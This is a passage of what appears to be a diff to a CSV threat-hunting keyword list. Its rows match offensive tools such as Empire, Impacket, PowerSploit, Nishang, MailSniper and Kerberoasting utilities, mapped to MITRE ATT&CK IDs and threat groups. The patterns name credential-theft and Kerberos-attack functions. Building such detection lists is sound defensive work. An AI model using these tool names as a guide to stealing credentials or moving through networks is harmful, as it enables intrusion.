Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SystemDNSServer.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-SystemNamedPipe*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-System.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*getTGT.py -dc-ip *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*getTGT.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*getTGT.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*gettgtpkinit.py -cert-pfx *","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z" "*gettgtpkinit.py -cert-pfx*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*gettgtpkinit.py -pfx-base64 
*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*gettgtpkinit.py*","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","5","493","68","2023-04-28T00:28:37Z","2021-07-27T19:06:09Z" "*Get-UnattendSensitiveData*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Get-USBKeystrokes*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1152","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-UserBadPwdCount*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-SMBAutoBrute.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-USBKeystrokes*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1152","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-UserBadPwdCount*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-SMBAutoBrute.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-UserPrivileges*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Get-UserPRTToken*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. 
network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" -"*GetUserSPNs.*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*Get-UserPRTToken*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*GetUserSPNs.*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*GetUserSPNs.vbs*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","10","1282","313","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" -"*Get-VaultCredential*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-VaultCredential*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Get-VaultCredential.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1055","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-VaultCreds*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Get-VolumeShadowCopy*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Get-WebCredentials*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Get-VaultCredential*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-VaultCredential*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-VaultCredential.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1055","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-VaultCreds*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Get-VolumeShadowCopy*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-WebCredentials*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" "*GetWebDAVStatus.csproj*","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","1","N/A","10","10","81","18","2021-09-29T17:40:52Z","2021-09-29T17:31:21Z" "*GetWebDAVStatus.sln*","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","1","N/A","10","10","81","18","2021-09-29T17:40:52Z","2021-09-29T17:31:21Z" "*GetWebDAVStatus_DotNet*","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 